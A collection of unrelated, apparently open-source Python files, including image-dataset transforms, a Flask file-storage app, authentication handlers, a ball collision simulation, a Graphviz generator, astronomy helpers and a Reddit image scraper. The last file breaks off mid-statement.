assert len(output_size) == 2
self.output_size = output_size
def __call__(self, sample):
image, label = sample['image'], sample['label']
top, left = sample['top'], sample['left']
new_h, new_w = self.output_size
new_h//=2
new_w//=2
sample['image'] = image[top: top + new_h,
left: left + new_w,:]
sample['label'] = label[top*2: (top + new_h)*2,
left*2: (left + new_w)*2,:]
return sample
class Flip(object):
"""
shape is (h,w,c)
"""
def __call__(self, sample):
flag_lr = sample['flip_lr']
flag_ud = sample['flip_ud']
if flag_lr == 1:
sample['image'] = np.fliplr(sample['image'])
sample['label'] = np.fliplr(sample['label'])
if flag_ud == 1:
sample['image'] = np.flipud(sample['image'])
sample['label'] = np.flipud(sample['label'])
return sample
class Rotate(object):
"""
shape is (h,w,c)
"""
def __call__(self, sample):
flag = sample['rotate']
if flag == 1:
sample['image'] = sample['image'].transpose(1, 0, 2)
sample['label'] = sample['label'].transpose(1, 0, 2)
return sample
class Sharp2Sharp(object):
def __call__(self, sample):
flag = sample['s2s']
if flag < 1:
sample['image'] = sample['label'].copy()
return sample
class ToTensor(object):
"""
Convert ndarrays in sample to Tensors.
"""
def __call__(self, sample):
image, label = sample['image'], sample['label']
# swap color axis because
# numpy image: H x W x C
# torch image: C X H X W
image = np.ascontiguousarray(image.transpose((2, 0, 1))[np.newaxis, :])
label = np.ascontiguousarray(label.transpose((2, 0, 1))[np.newaxis, :])
sample['image'] = torch.from_numpy(image).float()
sample['label'] = torch.from_numpy(label).float()
return sample
def normalize(x, centralize=False, normalize=False, val_range=255.0):
if centralize:
x = x - val_range / 2
if normalize:
x = x / val_range
return x
def normalize_reverse(x, centralize=False, normalize=False, val_range=255.0):
if normalize:
x = x * val_range
if centralize:
x = x + val_range / 2
return x
def equalize_histogram(image, number_bins=256):
image_histogram, bins = np.histogram(image.flatten(), number_bins)
cdf = image_histogram.cumsum()
cdf = (number_bins - 1) * cdf / cdf[-1] # normalize
image_equalized = np.interp(image.flatten(), bins[:-1], cdf)
return image_equalized.reshape(image.shape)
def get_file_path(ds_type, gain='00', root_path='/data/zengyuhang_data'):
ds_type=ds_type
FILE_LIST="./data_list/"+ ds_type + "_list"
# get train IDs
with open(FILE_LIST) as f:
text = f.readlines()
_files = text
_ids = [line.strip().split(' ')[0] for line in _files]
gt_files = [line.strip().split(' ')[1] for line in _files]
in_files = [line.strip().split(' ')[2] for line in _files]
gain=gain
_ids_copy=[]
for item in _ids:
if item[-7:-5]==gain:
_ids_copy.append(item)
_ids=_ids_copy
root_path=root_path
gt_files_copy=[]
for item in gt_files:
if item[-11:-9]==gain:
gt_files_copy.append(root_path+item[1:])
gt_files=gt_files_copy
in_files_copy=[]
for item in in_files:
if item[-11:-9]==gain:
in_files_copy.append(root_path+item[1:])
in_files=in_files_copy
return _ids, gt_files, in_files
def get_all_file_path(ds_type, root_path='/data/zengyuhang_data'):
ds_type=ds_type
FILE_LIST="./data_list/"+ ds_type + "_list"
# get train IDs
with open(FILE_LIST) as f:
text = f.readlines()
_files = text
_ids = [line.strip().split(' ')[0] for line in _files]
gt_files = [line.strip().split(' ')[1] for line in _files]
in_files = [line.strip().split(' ')[2] for line in _files]
return _ids, gt_files, in_files
def gen_var(seqs):
records=dict()
for seq in seqs:
sample=dict()
print(seq[0],"start loading...")
temp_dark=np.load(seq[0])
dark_shape=temp_dark.shape
del temp_dark
gc.collect()
print(seq[0],"start loading and EH process...")
sample['Dark']=equalize_histogram(np.memmap(seq[0], dtype='uint16', mode='r',shape=dark_shape),65536)
# sample['Dark']=equalize_histogram(np.load(seq[0]),65536)
print(seq[0],"is processed")
print(seq[1],"start loading...")
temp_bright=np.load(seq[1])
bright_shape=temp_bright.shape
del temp_bright
gc.collect()
sample['Bright']=np.memmap(seq[1], dtype='uint8', mode='r',shape=bright_shape)
# sample['Bright']=np.load(seq[1])
print(seq[1],"is loaded")
# print('dark_shape',sample['Dark'].shape)
# print('bright_shape',sample['Bright'].shape)
records[seq]=sample
return records
def gen_seq(seq):
sample=dict()
print(seq[0],"start loading...")
temp_dark=np.load(seq[0])
dark_shape=temp_dark.shape
del temp_dark
gc.collect()
print(seq[0],"start loading and EH process...")
sample['Dark']=equalize_histogram(np.memmap(seq[0], dtype='uint16', mode='r',shape=dark_shape),65536)
print(seq[0],"is processed")
print(seq[1],"start loading...")
temp_bright=np.load(seq[1])
bright_shape=temp_bright.shape
del temp_bright
gc.collect()
sample['Bright']=np.memmap(seq[1], dtype='uint8', mode='r',shape=bright_shape)
print(seq[1],"is loaded")
# print('dark_shape',sample['Dark'].shape)
# print('bright_shape',sample['Bright'].shape)
return sample
|
|
|
|
|
|
import os
import json
import errno
from node import Node
from subprocess import call
from werkzeug import secure_filename
from flask import Flask, render_template, abort, request, jsonify
app = Flask(__name__)
controller = None
ip = None
port = None
class WebApp():
def __init__(self, ctrl, host, p):
global controller, ip, port
controller = ctrl
ip = host
port = p
@app.route('/', methods=['GET'])
def show_page():
try:
return render_template('upload.html', rest_host=ip, rest_port=port,
entries=controller.get_ledger_entries())
except TemplateNotFound:
abort(404)
@app.route('/storage', methods=['POST'])
def upload_file():
if 'file' in request.files:
success = controller.store(
secure_filename(request.files['file'].filename),
request.files['file']
)
if success:
response = jsonify({"msg": 'File uploaded successfully.'})
response.status_code = 200
return response
else:
response = jsonify({"msg": "File couldn't be written to nodes."})
response.status_code = 500
return response
return jsonify({"msg": "File not present in request"})
@app.route('/storage/<file_name>', methods=['GET'])
def download_file(file_name):
file = controller.retrieve(
secure_filename(request.args.get('file_name'))
)
if file:
response = jsonify({"content": file})
response.status_code = 200
return response
else:
response = jsonify({"msg": "File couldn't be found."})
response.status_code = 500
return response
@app.route('/strategy/<choice>', methods=['POST'])
def set_strategy(choice):
controller.set_strategy(choice)
def start(self):
app.run(debug=True, host=ip, port=port)
|
|
classical_algorithms/python/tests/test_binary_search.py
|
|
|
|
import unittest
from classical_algorithms.python.BinarySearch import BinarySearch
class TestBinarySearch(unittest.TestCase):
def test_binary_search(self):
binary_search = BinarySearch()
print('None Input')
self.assertRaises(TypeError, binary_search.search, None)
print('Empty Input')
self.assertEqual(binary_search.search([], 1), False)
print('One Element')
self.assertEqual(binary_search.search([25], 25), 0)
print('Two or More Elements')
array = [0, 10, 15, 100, 150, 200, 203, 230]
self.assertEqual(binary_search.search(array, 15), 2)
print('Two or More with negative Elements')
array = [-20, -15, -5, 0, 10, 15, 100, 150, 200, 203, 230]
self.assertEqual(binary_search.search(array, -15), 1)
print('Success: binary_search_search\n')
if __name__ == '__main__':
unittest.main()
|
|
server/website/script/fixture_generators/metric_settings/oracle/create_metric_settings.py
|
|
|
|
#
# OtterTune - create_metric_settings.py
#
# Copyright (c) 2017-18, Carnegie Mellon University Database Group
#
import json
import shutil
def main():
final_metrics = []
with open('oracle.txt', 'r') as f:
odd = 0
entry = {}
fields = {}
lines = f.readlines()
for line in lines:
line = line.strip().replace("\n", "")
if not line:
continue
if line == 'NAME' or line.startswith('-'):
continue
if odd == 0:
entry = {}
entry['model'] = 'website.MetricCatalog'
fields = {}
fields['name'] = "global." + line
fields['summary'] = line
fields['vartype'] = 2 # int
fields['scope'] = 'global'
fields['metric_type'] = 3 # stat
if fields['name'] == "global.user commits":
fields['metric_type'] = 1 # counter
fields['dbms'] = 18 # oracle
entry['fields'] = fields
final_metrics.append(entry)
with open('oracle_metrics.json', 'w') as f:
json.dump(final_metrics, f, indent=4)
shutil.copy('oracle_metrics.json', '../../../../website/fixtures/oracle_metrics.json')
if __name__ == '__main__':
main()
|
|
|
|
|
|
from setuptools import setup, find_packages
with open('README.md', 'r') as readme:
long_desc = readme.read()
setup(name='wsgimagic',
version='1.0.0',
description='Serverless WSGI apps made easy',
packages=find_packages(exclude=('tests',)),
author="<NAME>",
license="MIT",
long_description=long_desc,
long_description_content_type='text/markdown')
|
|
|
|
|
|
from flask import g, make_response, jsonify
from flask_httpauth import HTTPBasicAuth
from app.api.errors import error_response
from app.models import User
auth = HTTPBasicAuth()
@auth.verify_password
def verify_password(username_or_token, password):
user = User.verify_auth_token(username_or_token)
if not user:
user = User.query.filter_by(username=username_or_token).first()
if not user or not user.verify_password(password):
return False
g.user = user
return True
@auth.error_handler
def basic_auth_error(status):
return error_response(status)
@auth.error_handler
def unauthorized():
return make_response(jsonify({'error': 'Unauthorized access'}), 403)
|
|
app/esper/queries/interview_with_person_x.py
|
scanner-research/esper-tv
|
|
|
from esper.prelude import *
from .queries import query
@query('Interview with person X (rekall)')
def interview_with_person_x():
from query.models import LabeledCommercial, FaceIdentity
from rekall.video_interval_collection import VideoIntervalCollection
from rekall.temporal_predicates import before, after, overlaps
from rekall.logical_predicates import or_pred
from esper.rekall import intrvllists_to_result
# Get list of sandbox video IDs
sandbox_videos = [
row.video_id
for row in LabeledCommercial.objects.distinct('video_id')
]
TWENTY_SECONDS = 600
FORTY_FIVE_SECONDS = 1350
EPSILON = 10
guest_name = "<NAME>"
# Load hosts and instances of guest from SQL
identities = FaceIdentity.objects.filter(face__shot__video_id__in=sandbox_videos)
hosts_qs = identities.filter(face__is_host=True)
guest_qs = identities.filter(identity__name=guest_name).filter(probability__gt=0.7)
# Put bounding boxes in SQL
hosts = VideoIntervalCollection.from_django_qs(
hosts_qs.annotate(video_id=F("face__shot__video_id"),
min_frame=F("face__shot__min_frame"),
max_frame=F("face__shot__max_frame"))
)
guest = VideoIntervalCollection.from_django_qs(
guest_qs.annotate(video_id=F("face__shot__video_id"),
min_frame=F("face__shot__min_frame"),
max_frame=F("face__shot__max_frame"))
)
# Get all shots where the guest and a host are on screen together
guest_with_host = guest.overlaps(hosts).coalesce()
# This temporal predicate defines A overlaps with B, or A before by less than 10 frames,
# or A after B by less than 10 frames
overlaps_before_or_after_pred = or_pred(
or_pred(overlaps(), before(max_dist=EPSILON), arity=2),
after(max_dist=EPSILON), arity=2)
# This code finds sequences of:
# guest with host overlaps/before/after host OR
# guest with host overlaps/before/after guest
interview_candidates = guest_with_host \
.merge(hosts, predicate=overlaps_before_or_after_pred) \
.set_union(guest_with_host.merge(
guest, predicate=overlaps_before_or_after_pred)) \
.coalesce()
# Sequences may be interrupted by shots where the guest or host don't
# appear, so dilate and coalesce to merge neighboring segments
interviews = interview_candidates \
.dilate(TWENTY_SECONDS) \
.coalesce() \
.dilate(-1 * TWENTY_SECONDS) \
.filter_length(min_length=FORTY_FIVE_SECONDS)
# Return intervals
return intrvllists_to_result(interviews.get_allintervals())
|
|
|
|
|
|
#!/usr/bin/env python3
"""
Starts a service on 127.0.0.1:25025 which serves as a sink for email
"""
### requires the python-pidfile library from https://github.com/mosquito/python-pidfile
### requires aiosmtpd
import asyncio, pidfile, signal, functools
from smtplib import SMTP, SMTPRecipientsRefused
import aiosmtpd
from aiosmtpd.handlers import Sink
from aiosmtpd.smtp import SMTP as SMTPServer
import logging
LISTEN_PORT = 25025
# TRANSMIT_PORT = 10026
logger = logging.getLogger(__name__)
logger.setLevel(logging.DEBUG)
def signal_handler(sig, *args):
if sig in {signal.SIGTERM, sig.SIGINT}:
logger.debug(f"CHAPPS exiting on {signal.Signals(sig)} ({sig}).")
raise SystemExit
def install_asyncio_signal_handlers(loop):
for signame in {"SIGTERM", "SIGINT"}:
sig = getattr(signal, signame)
loop.add_signal_handler(sig, functools.partial(signal_handler, sig))
# class NullFilterHandler:
# async def handle_RCPT(self, server, session, envelope, address, rcpt_options):
# """Handle recipient phase"""
# envelope.rcpt_tos.append( address )
# return "250 OK"
# async def handle_DATA(self, server, session, envelope):
# """Handle DATA phase"""
# logger.debug(f"Message from {envelope.mail_from} to ")
# try:
# client = SMTP.sendmail( envelope.mail_from, envelope.rcpt_tos, envelope.content )
# return '250 Message accepted for delivery'
# except smtplib.SMTPResponseException as e:
# logger.exception("Upstream Postfix did not like this message.")
# return f"{e.smtp_code} {e.smtp_error}"
# except smtplib.SMTPException:
# logger.exception("Raised trying to send from {envelope.mail_from} to {','.join(envelope.rcpt_tos)}")
# return "550 Requested action not taken"
async def main():
"""The grand shebang"""
logger.debug("Starting SMTP sink...")
try:
with pidfile.PIDFile("/tmp/mail-sink.pid"):
logger.debug("mail-sink started.")
loop = asyncio.get_running_loop()
install_asyncio_signal_handlers(loop)
srv = await loop.create_server(
functools.partial(SMTPServer, Sink),
"localhost",
LISTEN_PORT,
start_serving=False,
)
async with srv:
await srv.serve_forever()
except pidfile.AlreadyRunningError:
logger.exception("mail-sink is already running. Exiting.")
except asyncio.exceptions.CancelledError:
logger.debug("mail-sink exiting on signal.")
if __name__ == "__main__":
try:
asyncio.run(main())
except Exception:
logger.exception("UNEX")
|
|
|
ParthaAcharjee/Ball-Movement-in-2D
|
|
|
# Ball movement in 2D space: An example of elastic collision and position tracking.
import random as rnd
import matplotlib.pyplot as plt
import numpy as np
import matplotlib.animation as animation
class ball:
'Ball class, store ball position and velocities'
count=0
def __init__(self,**arg):
if 'x' in arg.keys():
self.x=arg['x'];
else:
self.x=rnd.randrange(0,100,1);
if 'y' in arg.keys():
self.y=arg['y'];
else:
self.y=rnd.randrange(0,100,1);
if 'r' in arg.keys():
self.r=arg['r'];
else:
self.r=1;
if 'vx' in arg.keys():
self.vx=arg['vx'];
else:
self.vx=rnd.randrange(-10,10,1);
if 'vy' in arg.keys():
self.vy=arg['vy'];
else:
self.vy=rnd.randrange(-10,10,1);
ball.count+=1;
def show(self):
print("x,y,vx,vy: ",self.x,self.y,self.vx,self.vy)
def plot(self):
plt.scatter(self.x,self.y)
plt.show()
def updatePosition(self,t,L):
xmin,xmax,ymin,ymax=L;
xnew=self.x+self.vx*t;
ynew=self.y+self.vy*t;
if xnew>xmax: xnew=2*xmax-xnew;self.vx=-self.vx;
if xnew<xmin: xnew=2*xmin-xnew;self.vx=-self.vx;
if ynew>ymax: ynew=2*ymax-ynew;self.vy=-self.vy;
if ynew<ymin: ynew=2*ymin-ynew;self.vy=-self.vy;
self.x=xnew;
self.y=ynew;
return
########### End of classes ####################
def checkCollision(a,b):
return pow(pow(a.x-b.x,2)+pow(a.y-b.y,2),0.5)<(a.r+b.r)
def collisionUpdate(a,b):
c=((a.vx-b.vx)*(a.x-b.x)+(a.vy-b.vy)*(a.y-b.y))/(pow(a.x-b.x,2)+pow(a.y-b.y,2));
a.vx=a.vx-c*(a.x-b.x);
a.vy=a.vy-c*(a.y-b.y);
b.vx=b.vx+c*(a.x-b.x);
b.vy=b.vy+c*(a.y-b.y);
return a,b;
########### End of functions ####################
N=50
b=[ball() for k in range(0,N)]
t=0.1
boundary=(0,100,0,100)
CYCLE=500;
ims=[]
fig=plt.figure()
ax = fig.add_axes([0, 0, 1, 1], frame_on=False)
ax.set_xlim(-1, 101), ax.set_xticks([])
ax.set_ylim(-1, 101), ax.set_yticks([])
for cycle in range(0,CYCLE):
for m in range(0,N-1):
for n in range(m+1,N):
collision=checkCollision(b[m],b[n])
if collision:
b[m],b[n]=collisionUpdate(b[m],b[n])
continue
for k in range(0,N):
b[k].updatePosition(t,boundary);
data=np.zeros((N,2))
for k in range(0,N):
data[k,]=b[k].x,b[k].y
#data=np.append(data,[[0,0],[0,100],[100,0],[100,100]],axis=0)
#plt.hold(False)
im=ax.scatter(data[:,0],data[:,1], animated=True, color='blue')
ims.append([im])
#plt.axis([-1,101,-1,101])
#plt.pause(0.0000001)
ani = animation.ArtistAnimation(fig, ims, interval=50, blit=True,
repeat_delay=10)
|
|
graph_notes/compile/generate_graphs.py
|
weepingwillowben/interactive_info_graph
|
|
|
from .utils import read_csv,join,key_dictlist_by,linejoin,read_file,write_file
import subprocess
import os
import json
import re
import multiprocessing
from concurrent.futures import ThreadPoolExecutor
def create_multiline_description(descrip):
words = descrip.split()
cur_line = ''
lines = []
MAX_LINE_LEN = 32
for word in words:
added_line = cur_line + " " + word
if len(added_line) > MAX_LINE_LEN:
lines.append(cur_line)
cur_line = word
else:
cur_line = added_line
if cur_line:
lines.append(cur_line)
return "<BR/>".join(lines)
def create_label(node):
title = f"<B>{node['title']}</B>"
if node['description'] and node['description'] != "NA":
return title+"<BR/>"+create_multiline_description(node['description'])
else:
return title
def generate_graphviz_code(all_nodes,all_relations,show_nodes,node_types,rel_types):
show_nodes = set(show_nodes)
nodes = [n for n in all_nodes if n['node'] in show_nodes]
relations = [rel for rel in all_relations
if rel['source'] in show_nodes and rel['dest'] in show_nodes and (rel['type'] == 'dependent' or rel['type'] == 'equal')]
node_graph = [f'{n["node"]} [label=<{create_label(n)}>,color="{node_types[n["type"]]["color"]}",id={n["node"]+"__el"}]' for n in nodes]
rel_graph = [f'{rel["source"]} -> {rel["dest"]} [color="{rel_types[rel["type"]]["color"]}"]' for rel in relations]
graph = f'''
digraph search {{
overlap = false;
{linejoin(node_graph)}
{linejoin(rel_graph)}
}}
'''
return graph
def call_graphviz(graphviz_code):
graphviz_args = "dot -Tsvg".split(' ')
out = subprocess.run(graphviz_args,input=graphviz_code,stdout=subprocess.PIPE,encoding="utf-8").stdout
#print("\n".join(out.split("\n")[:3]))
stripped = "\n".join(out.split("\n")[3:])
comments_removed = re.sub("(<!--.*?-->)", "", stripped, flags=re.DOTALL)
return comments_removed
def get_adj_list(nodes,relations):
return {n['node']:[rel['dest'] for rel in relations if rel['source'] == n['node']] for n in nodes}
def score_nodes(root,adj_list):
scores = dict()
depth_nodes = [root]
for x in range(10):
new_depth_nodes = []
for n in depth_nodes:
if n not in scores:
scores[n] = 8.**(-x) * (1+1e-5*len(adj_list[n]))
for e in adj_list[n]:
new_depth_nodes.append(e)
depth_nodes = new_depth_nodes
sortables_scores = [(v,k) for k,v in scores.items()]
sortables_scores.sort(reverse=True)
return [n for v,n in sortables_scores]
def generate_all_graphs(graph_size,nodes,relations,node_types,rel_types):
adj_list = get_adj_list(nodes,relations)
nodes_generated = {}
node_to_idx = {}
vis_codes = []
for node in nodes:
node_names = score_nodes(node['node'],adj_list)[:graph_size] if graph_size < len(adj_list) else list(adj_list)
uniq_node_names = tuple(sorted(node_names))
if uniq_node_names not in nodes_generated:
nodes_generated[uniq_node_names] = len(vis_codes)
node_to_idx[node['node']] = len(vis_codes)
viz_code = generate_graphviz_code(nodes,relations,node_names,node_types,rel_types)
vis_codes.append(viz_code)
else:
node_to_idx[node['node']] = nodes_generated[uniq_node_names]
pool = ThreadPoolExecutor(max_workers=multiprocessing.cpu_count())
svg_codes = list(pool.map(call_graphviz,vis_codes))
graphs = [(node['node'],svg_codes[node_to_idx[node['node']]]) for node in nodes]
return graphs
def save_graphs_as_files(dest_folder,svg_list):
os.makedirs(dest_folder,exist_ok=True)
for node_name,svg_code in svg_list:
fname = node_name+".svg"
dest_path = os.path.join(dest_folder,fname)
write_file(dest_path,svg_code)
def encode_graphs_as_html(svg_list):
all_data = [""]
for node_name,svg_code in svg_list:
stripped_svg_code = svg_code.replace("\n","")
data_str = f'<script id="{node_name+"__svg"}" type="application/svg">{stripped_svg_code}></script>'
all_data.append(data_str)
return "\n\t\t".join(all_data)
if __name__ == "__main__":
node_types = key_dictlist_by(read_csv("examples/computer_science/node-types.csv"),'type_id')
rel_types = key_dictlist_by(read_csv("examples/computer_science/rel-types.csv"),'type_id')
nodes = read_csv("examples/computer_science/nodes.csv")
rels = read_csv("examples/computer_science/relationships.csv")
show_nodes = [n['node'] for n in nodes]
graph_code = (generate_graphviz_code(nodes,rels,show_nodes,node_types,rel_types))
print(graph_code)
svg_code = call_graphviz(graph_code)
html_code = encode_graphs_as_html([("bob",svg_code)])
print(svg_code)
print(html_code)
|
|
|
mattcwilde/werk-squad-tools
|
|
|
import pandas as pd
import numpy as np
from astropy import constants as const
from astropy import units as u
from astropy.cosmology import FlatLambdaCDM
def SFR(Ha_array):
"""
Calculate distance using H-alpha luminosity.
-------------------------------------------
Method:
Distance calc made using astropy.cosmology packages cosmo.luminosity_distance() method
See documentation here: https://docs.astropy.org/en/stable/cosmology/
------------------------------------------
Args:
Numpy nd.array of H-alpha Luminosities
------------------------------------------
Returns:
Numpy nd.array
"""
SFR = np.array([])
SFR_calc = [((7.9e-42) * i) for i in Ha_array]
SFR = np.append(SFR, SFR_calc)
return SFR
def SFR_switchboard(lines_df):
"""
Assign flags based on which lines are used to calculate SFR/ H-alpha Luminosity
if Flag = 'NaN' -- No determination
= 'Ha' -- H-alpha lines used
= 'Hb' -- H-beta lines used
-------------------------------------------
Method Assumed for SFR/H-alpha Lum calculations:
Ha_Lum_Ha = (LQ_cut_Ha['Halpha_flux']) * (4 * np.pi * (LQ_cut_Ha['Distance_cm'])**2)
Ha_Lum_Hb = ((LQ_cut_Hb['Hbeta_flux']) * 2.86) * (4 * np.pi * (LQ_cut_Hb['Distance_cm'])**2)
Where LQ_cut_* corresponds to using the respective *_cond written in this function
SFR = ((7.9e-42) * Ha_Lum)
------------------------------------------
Args:
DataFrame containing Line Quality information for H-alpha and H-beta
------------------------------------------
Returns:
3 numpy.ndarray (arrays = Flags, Ha indices, Hb indices), all entries dtype = str
"""
# Make integers for conditionals
lines_df.Halpha_LQ.astype('Int64')
lines_df.Hbeta_LQ.astype('Int64')
# Conditions for each calc
Ha_cond = (lines_df['Halpha_LQ']>0) & (lines_df['Halpha_LQ']<2)
Hb_cond = (lines_df['Hbeta_LQ']>0) & (lines_df['Hbeta_LQ']<2) & (lines_df['Halpha_LQ']!=1)
# Make flags
SFR_flags = np.full(len(lines_df), str(np.nan))
SFR_flags[Ha_cond] = 'Ha'
SFR_flags[Hb_cond] = 'Hb'
return SFR_flags
|
|
src/dataset/writer/csv_writer.py
|
KlemenGrebovsek/Cargo-stowage-optimization
|
|
|
import csv
import os
from src.dataset.writer.ds_writer import DatasetWriterInterface
from src.model.dataset import Dataset
class CSVDatasetWriter(DatasetWriterInterface):
def write(self, dir_path: str, file_name: str, dataset: Dataset):
"""Writes dataset to csv file.
Args:
file_name: Dataset file name without file extension.
dataset: Dataset to write.
dir_path: Path to dir.
Throws:
ValueError
Returns: Dataset from file.
"""
if dir_path is None or len(dir_path) < 1 or not os.path.isdir(dir_path):
raise ValueError('Invalid dir path')
if file_name is None or len(file_name) < 1:
raise ValueError('Invalid file name')
full_path = os.path.join(dir_path, file_name+'.csv')
if os.path.isfile(full_path):
raise ValueError('File already exists')
with open(full_path, 'w', newline='') as f:
writer = csv.writer(f)
writer.writerow([dataset.title])
writer.writerow([dataset.total_packages,
dataset.total_stations,
dataset.width,
dataset.height])
for package in dataset.packages:
writer.writerow([package.id, package.station_in, package.station_out, package.weight])
|
|
src/closure_table/auth/views.py
|
vyacheslav-bezborodov/dvhb
|
|
|
import hashlib
from datetime import datetime, timedelta
import jwt
from aiohttp import web
from closure_table.auth.db.queries import user_get
from closure_table.settings import JWT_ALGORITHM, JWT_EXP_DELTA_SECONDS, JWT_SECRET
async def user_login_view(request):
params = await request.json()
email = params.get('email')
password = params.get('password')
async with request.app['db'].acquire() as conn:
user = await user_get(conn, email)
m = hashlib.sha512()
m.update(str(password).encode())
m.update(str(user.get('id')).encode())
if email != user.get('email') or m.hexdigest() != user.get('password'):
return web.json_response(status=400, data={
'error': 'Incorrect email or password'
})
expired = datetime.utcnow() + timedelta(seconds=JWT_EXP_DELTA_SECONDS)
payload = {
'email': user['email'],
'exp': expired
}
jwt_token = jwt.encode(payload, JWT_SECRET, JWT_ALGORITHM)
return web.json_response({
'token': jwt_token.decode(),
'expired': expired.strftime('%c'),
})
|
|
|
|
|
|
from model.base import BaseModel
from schema.group import GroupOut
from sqlalchemy import (
Column,
String
)
from sqlalchemy.orm import relationship
class Group(BaseModel):
__tablename__ = 'GROUP'
name = Column('NAME', String, nullable=False, unique=True)
group_user = relationship("UserGroup", back_populates="group")
group_permission = relationship("Permission", back_populates="group")
group_permission_part = relationship("PermissionPart", back_populates="group")
def ToGroupOut(self) -> GroupOut:
return GroupOut(
id = self.id,
name = self.name,
created_at = self.created_at,
updated_at = self.updated_at
)
|
|
|
|
|
|
"""
This module is similar to a LLVM SSA.
https://releases.llvm.org/2.6/docs/LangRef.html#i_load
"""
|
|
|
|
|
|
w_widht = 500
w_height = 500
colors = { 'grid': (255,255,255),
'background': (0,0,0),
'x': (255,0,0),
'o': (0,255,0),
'cross': (0,0,255)}
|
|
|
WasinUddy/Reddit-Image-Scraper
|
|
|
import pandas as pd
import numpy as np
import praw
import cv2
import requests
from tkinter import *
from tkinter.ttk import *
from PIL import Image as PILIMAGE
import os
from pathlib import Path
class Reddit:
def __init__(self, client_ID, client_secret):
self.reddit = praw.Reddit(
client_id=client_ID,
client_secret=client_secret,
user_agent='cor',
username=None,
password=<PASSWORD>
)
self.index = 0
def getSubreddit(self, csvFile):
self.subreddits = []
f_final = open(csvFile, "r")
for line in f_final:
sub = line.strip()
self.subreddits.append(sub)
def run(self, N, path):
print(path)
self.downloadImage(N, path)
def downloadImage(self, N, path):
ignoreImages = [cv2.imread("resources/ignoreImages/imageNF.png"), cv2.imread("resources/ignoreImages/DeletedIMG.png")]
for subreddit in self.subreddits:
if not os.path.exists(f"{path}/{subreddit}"):
os.makedirs(f"{path}/{subreddit}")
subreddit = self.reddit.subreddit(subreddit)
i = 0
for submission in subreddit.new(limit=int(N)):
#
#
# self.progress['value'] += self.progress['value']
try:
if "jpg" in submission.url.lower() or "png" in submission.url.lower():
resp = requests.get(submission.url.lower(), stream=True).raw
image = np.asarray(bytearray(resp.read()), dtype='uint8')
image = cv2.imdecode(image, cv2.IMREAD_COLOR)
# Compare with ignore Image
ignoreERROR = False
compare_image = cv2.resize(image, (224, 224))
for ignore in ignoreImages:
diff = cv2.subtract(ignore, compare_image)
b_ch, g_ch ,r_ch = cv2.split(diff)
tdiff = cv2.countNonZero(b_ch) + cv2.countNonZero(g_ch) + cv2.countNonZero(r_ch)
# Image has to be ignore
if tdiff == 0:
ignoreERROR = True
if not ignoreERROR:
image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
img = PILIMAGE.fromarray(image)
img.save(f"{path}/{subreddit}/{i}.png")
print(f"saved --> {path}/{subreddit}/{i}.png")
i += 1
except:
pass
|
|
|
|
|
|
"""Tests for Winixdevice component."""
from unittest.mock import AsyncMock, MagicMock, Mock
import pytest
from custom_components.winix.device_wrapper import WinixDeviceWrapper
from custom_components.winix.driver import WinixDriver
@pytest.fixture
def mock_device_wrapper() -> WinixDeviceWrapper:
"""Return a mocked WinixDeviceWrapper instance."""
device_wrapper = MagicMock()
device_wrapper.info.mac = "f190d35456d0"
device_wrapper.info.alias = "Purifier1"
device_wrapper.async_plasmawave_off = AsyncMock()
device_wrapper.async_plasmawave_on = AsyncMock()
device_wrapper.async_set_preset_mode = AsyncMock()
device_wrapper.async_set_speed = AsyncMock()
device_wrapper.async_turn_on = AsyncMock()
yield device_wrapper
@pytest.fixture
def mock_driver() -> WinixDriver:
"""Return a mocked WinixDriver instance."""
client = Mock()
device_id = "device_1"
yield WinixDriver(device_id, client)
@pytest.fixture
def mock_driver_with_payload(request) -> WinixDriver:
"""Return a mocked WinixDriver instance."""
json_value = {"body": {"data": [{"attributes": request.param}]}}
response = Mock()
response.json = AsyncMock(return_value=json_value)
client = Mock() # aiohttp.ClientSession
client.get = AsyncMock(return_value=response)
device_id = "device_1"
yield WinixDriver(device_id, client)
|
|
dev/scripts/docker_build.py
|
|
|
|
from flowserv.controller.worker.docker import docker_build
image, logs = docker_build(name='test_build', requirements=['histore'])
print('\n'.join(logs))
print()
print(image)
|
|
GEOS_Util/coupled_diagnostics/verification/levitus/s_profile.py
|
|
|
|
#!/bin/env python
import os
import scipy as sp
import matplotlib.pyplot as pl
from matplotlib import ticker
# Read variable
execfile('ctl.py')
iind=300
s=ctl.fromfile('salt',iind=iind).ave(0)
s.name='S at 60W'
###################### Do plots #######################################################
clevs=sp.arange(33.,36.1,0.2)
pl.figure(1)
pl.clf()
s.copts={'func': pl.contourf,\
'levels' : clevs,\
}
s.plot2d(); s.copts.clear()
s.copts={'levels' : clevs[0::2],\
'colors' : 'black',\
'func': pl.contour
}
s.plot2d()
ax=pl.gca(); ax.set_ylim(0.,3000.); ax.invert_yaxis(); ax.set_ylabel('depth, m')
ax.xaxis.set_major_locator(ticker.MultipleLocator(30))
pl.grid(); pl.show()
pl.savefig('pics/s_profile/s_60W.png')
|
|
|
CosminNechifor/Assembly-to-VHDL-memory
|
|
|
from tkinter import *
from src.tools import parser
from src.bll import logic
global text
global riscInstructions
PATH_TO_JSON = './tools/instructions.json'
PATH_TO_MEMORY_S = './bll/memoryStart.txt'
PATH_TO_MEMORY_E = './bll/memoryEnd.txt'
def writeMemory():
# assemblyCode = text.get("1.0",END).split('\n')
# assemblyCode.pop()
assemblyCode = ['XOR r1, r2, r3', 'ADDI r3, r2, 100', 'JMP r4']
size = len(assemblyCode)
binary = logic.convertAssemblyToBinary(assemblyCode, riscInstructions)
print(binary)
logic.binaryToVHDLMemory(binary, pathS=PATH_TO_MEMORY_S, pathE=PATH_TO_MEMORY_E)
def createWindow():
global text
global riscInstructions
quit = Button(text="QUIT", fg="red",
command=root.destroy)
quit.pack(side="bottom")
assemble = Button(text="Create memory", fg="blue", command=writeMemory)
assemble.pack(side="bottom")
scroolBar = Scrollbar(root)
text = Text(root, height=50, width=50)
scroolBar.pack(side=RIGHT, fill=Y)
text.pack(side=LEFT, fill=Y)
scroolBar.config(command=text.yview)
text.config(yscrollcommand=scroolBar.set)
riscInstructions = parser.getInstructions(PATH_TO_JSON)
if __name__ == '__main__':
root = Tk()
createWindow()
root.mainloop()
|
|
|
maximilianschaller/genforce
|
|
|
# python3.7
"""Collects all runners."""
from .stylegan_runner_fourier_regularized import FourierRegularizedStyleGANRunner
__all__ = ['FourierRegularizedStyleGANRunner']
|
|
|
MHDBST/Movie_Recommender_System
|
|
|
import random
import math
file='ratings.csv'
train_list=[]
test_list=[]
temp_list=[]
preID=-1
with open(file) as votes:
